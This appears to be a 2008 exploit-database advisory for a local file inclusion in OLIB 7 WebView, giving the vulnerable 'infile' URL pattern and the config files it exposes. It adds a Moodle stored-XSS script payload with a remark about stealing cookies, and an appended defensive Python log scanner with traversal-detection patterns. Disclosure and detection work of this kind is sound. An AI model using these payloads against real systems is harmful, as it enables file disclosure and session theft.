Vendor: OLIB 7 WebView
By: ZeN
CVSS: 7.5 (HIGH)
Type: LFI
CWE: N/A
Product Name: OLIB 7 WebView
Affected Version From: 2.5.1.1
Affected Version To: 2.5.1.1
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Security Advisory for ‘OLIB 7 Webview’

http://olib.site.com/cgi/?session=[session_key]&infile=[LFI]

Files in dir: get_settings.ini, setup.ini (contains config file locations), text.ini

You need to log in to get a valid session key.

Mitigation:

Login to get a valid session key.

Exploit-DB raw data:

Security Advisory for 'OLIB 7 Webview'

This software is a part of Moodle.

Software - OLIB 7 WebView v2.5.1.1
Exploit  - LFI
Severity - High
Author	 - ZeN
website  - http://dusecurity.com/
Date	 - 2nd October 2008

DUSecurity Team / DarkCode


Exploit >

http://olib.site.com/cgi/?session=[session_key]&infile=[LFI]

files in dir - get_settings.ini, setup.ini(contains config file locations), text.ini


Info - You need to login to get a valid session key.


------------------
Extraz :

Moodle Permanent XSS

In Moodle blogging system, simply make a new blog entry with the title

<script>alert()</script>

Now everyone that visits the blogging system will execute your XSS.
Go get some cookies =D

Enjoy!

------------------


Shouts :-
DUSecurity.com
DarkCode.me
Milw0rm.com
iWannaHack
WL-Group

# milw0rm.com [2008-10-02]
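
Added example, not part of the original advisory and not OLIB code: a log check a defender could run to find the `infile` requests the advisory describes. The access-log format, the sample lines and the benign value `search.htm` are constructed assumptions; the three .ini names are the ones the advisory lists.

```python
import re
from urllib.parse import urlsplit, parse_qs

# File names the advisory lists as readable through `infile`.
ADVISORY_FILES = {"get_settings.ini", "setup.ini", "text.ini"}
# Assumption: web-server access log in common/combined format.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (not real traffic); session values are placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Oct/2008:10:00:00 +0000] "GET /cgi/?session=PLACEHOLDER&infile=search.htm HTTP/1.1" 200 512',
    '203.0.113.9 - - [02/Oct/2008:10:01:00 +0000] "GET /cgi/?session=PLACEHOLDER&infile=setup.ini HTTP/1.1" 200 2048',
    '203.0.113.9 - - [02/Oct/2008:10:02:00 +0000] "GET /cgi/?session=PLACEHOLDER&infile=..%2F..%2Fsetup.ini HTTP/1.1" 200 2048',
    '203.0.113.7 - - [02/Oct/2008:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 100',
]

def classify_infile(value):
    """Return why an already URL-decoded infile value is suspicious, or None."""
    if "\x00" in value:
        return "null byte"
    if ".." in value:
        return "directory traversal sequence"
    if value.startswith(("/", "\\")) or re.match(r"[A-Za-z]:", value):
        return "absolute path"
    if re.split(r"[\\/]", value.lower())[-1] in ADVISORY_FILES:
        return "config file named in the advisory"
    return None

def scan(lines):
    """Return (line number, decoded infile value, reason) for each flagged request."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.startswith("/cgi/"):
            continue
        # parse_qs percent-decodes once, so ..%2F is compared as ../
        for value in parse_qs(url.query, keep_blank_values=True).get("infile", []):
            reason = classify_infile(value)
            if reason:
                findings.append((lineno, value, reason))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 response on a flagged line is the case to triage first, since it suggests the file was actually served.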